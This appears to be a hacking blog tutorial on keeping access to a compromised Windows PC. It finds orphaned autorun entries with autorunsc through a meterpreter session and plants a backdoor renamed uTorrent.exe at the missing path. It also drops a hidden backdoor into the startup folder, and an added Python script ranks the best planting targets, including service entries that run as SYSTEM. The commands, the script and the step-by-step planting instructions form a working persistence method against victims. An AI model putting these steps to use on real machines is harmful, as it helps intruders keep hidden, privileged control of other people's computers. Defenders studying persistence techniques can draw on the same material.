Get a shell using missing autoruns
Today we will see another method of maintaining access to a compromised PC.
(A) When we install a program in a Windows environment, some programs ask to run at startup. Such a program writes a value to the Windows registry (for example under a Run key), and whenever the PC restarts (more precisely, whenever a user logs on) the program runs in the background. When uninstallation of the program is incomplete, the uninstaller fails to remove that registry value, so the entry now points at a file that no longer exists. These are called missing autoruns.
After compromising the PC, we have to find the missing autoruns on the victim machine. For this purpose we will use Sysinternals' autorunsc.exe (the console version of Autoruns).
(1) Get a meterpreter shell.
(2) Upload Sysinternals' autorunsc.exe to the victim machine (autoruns.exe is the GUI version; only the console autorunsc.exe is needed here).
(3) From the upload directory, execute the following command to list the missing autoruns of the machine (findstr /n prefixes each hit with its line number; /R treats the pattern as a regular expression, which is why the spaces are escaped with a backslash):
autorunsc.exe -a | findstr /n /R "File\ not\ found"
(4) Now we have the list of files that are missing; these are files Windows still tries to run at startup, so the only thing absent is the binary itself.
[screenshot: missing-autoruns]
(5) In my case you can see that uTorrent.exe is missing.
(6) So I rename my backdoor to uTorrent.exe and upload it to the path where it was not found. Check first that the account you have can write to that directory: a path under the user's profile (as here) is writable by that user, while a path under Program Files or System32 needs administrator rights. Also make sure the entry is enabled and that the backdoor's architecture (32/64-bit) matches what the autorun expects.
[screenshot: upload-backdoor]
Now whenever the machine is restarted (for Run-key entries, whenever the user logs on; an HKLM entry fires for every user, an HKCU entry only for that user) you get a shell. Don't forget to have multi/handler running!
As a proof of concept, you can run autorunsc.exe again to find out whether our backdoor (uTorrent.exe) was written successfully.
[screenshot: missing-autorun-backdoor]
In the above image you can see that uTorrent.exe, which was missing in the previous step, is no longer reported as missing.
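The steps above are done by eye in a screenshot; on a host with many entries it is easier to have autorunsc write CSV (its -c switch) and triage the file on the attacker side. The script below is an added example and is not part of the original post or of the Sysinternals tools. It assumes the CSV carries the columns "Entry Location", "Entry", "Enabled" and "Image Path", and that a missing image appears as "File not found: <path>" in the Image Path column, as the Autoruns GUI shows it; the sample data is constructed, not captured from a real host. For each missing entry it reports whether the entry is per-user or machine-wide, whether the target path lies under a user profile (so it is likely writable without admin rights), and whether it is a service entry, which would run the planted binary in the service's account rather than the logged-on user's.

```python
"""Triage autorunsc CSV output for missing autoruns (added example)."""
import csv
import io
import re

# Constructed sample modelled on autorunsc CSV output; not data from a real host.
# Column names and the "File not found: <path>" convention are assumptions.
SAMPLE_CSV = r"""Entry Location,Entry,Enabled,Description,Publisher,Image Path,Launch String
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Windows Security notification icon,Microsoft Corporation,c:\windows\system32\securityhealthsystray.exe,%windir%\system32\SecurityHealthSystray.exe
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,uTorrent,enabled,,,File not found: C:\Users\nirav\AppData\Roaming\uTorrent\uTorrent.exe,C:\Users\nirav\AppData\Roaming\uTorrent\uTorrent.exe /MINIMIZED
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,OldUpdater,disabled,,,File not found: C:\Program Files\OldVendor\updater.exe,C:\Program Files\OldVendor\updater.exe /silent
HKLM\SYSTEM\CurrentControlSet\Services,BrokenSvc,enabled,Leftover service,,File not found: C:\Program Files\Vendor\svc.exe,C:\Program Files\Vendor\svc.exe
"""

MISSING_RE = re.compile(r"^File not found:\s*(.+?)\s*$", re.IGNORECASE)
# Profile directories on Vista+ and on XP; writable by the profile owner.
USER_PROFILE_RE = re.compile(r"^[A-Z]:\\(Users|Documents and Settings)\\", re.IGNORECASE)


def decode_autoruns_output(data: bytes) -> str:
    """autorunsc writes UTF-16 with a BOM; fall back to UTF-8 otherwise."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")


def missing_autoruns(csv_text: str, enabled_only: bool = True) -> list:
    """Return the entries whose image file is missing, with planting hints."""
    found = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        match = MISSING_RE.match((row.get("Image Path") or "").strip())
        if not match:
            continue
        enabled = (row.get("Enabled") or "").strip().lower() == "enabled"
        if enabled_only and not enabled:  # a disabled entry never fires
            continue
        location = (row.get("Entry Location") or "").strip()
        path = match.group(1)
        found.append({
            "location": location,
            "entry": (row.get("Entry") or "").strip(),
            "path": path,
            "enabled": enabled,
            # HKCU entries fire only when that user logs on.
            "per_user_location": location.upper().startswith(("HKCU", "HKEY_CURRENT_USER")),
            # Paths under a profile are usually writable without admin rights.
            "path_in_user_profile": bool(USER_PROFILE_RE.match(path)),
            # Service entries run as the service account, often SYSTEM.
            "runs_as_service": "\\SERVICES" in location.upper(),
        })
    return found


def report(entries: list) -> str:
    """One line per missing entry: path plus the hints that decide priority."""
    lines = []
    for e in entries:
        hints = []
        if e["runs_as_service"]:
            hints.append("service entry")
        hints.append("per-user" if e["per_user_location"] else "machine-wide")
        if e["path_in_user_profile"]:
            hints.append("path under a user profile")
        lines.append(f"{e['entry']}: {e['path']}  [{'; '.join(hints)}]")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(missing_autoruns(SAMPLE_CSV)))
```

Running autorunsc with -c on the victim, downloading the file through meterpreter and feeding its bytes to decode_autoruns_output then missing_autoruns reproduces steps (3) and (4); running it again after the upload in step (6) reproduces the proof-of-concept check, since the planted entry drops out of the list. The most valuable hits are machine-wide or service entries whose path sits somewhere a low-privileged user can write: planting there runs your binary in a more privileged context than the account you currently hold.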
(B) Now the second method, which may be more suspicious: the startup folder is one of the first places anyone (and every Autoruns-style tool) looks.
When you put a binary in the startup folder it runs automatically when the user logs on.
Startup folder location in Windows XP:
C:\Documents and Settings\<username>\Start Menu\Programs\Startup
Startup folder location in Windows 7:
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
(These per-user folders are writable by that user. The all-users startup folders, C:\Documents and Settings\All Users\Start Menu\Programs\Startup on XP and C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp on Windows 7, run for every user but require administrator rights to write to.)
So upload your binary to the startup folder and make it hidden using the following command (note that the hidden attribute only hides it from a default Explorer view or dir listing; dir /a and Autoruns still show it):
attrib +h backdoor.exe
Restart the machine (or log off and on) and, hopefully, you will get a shell.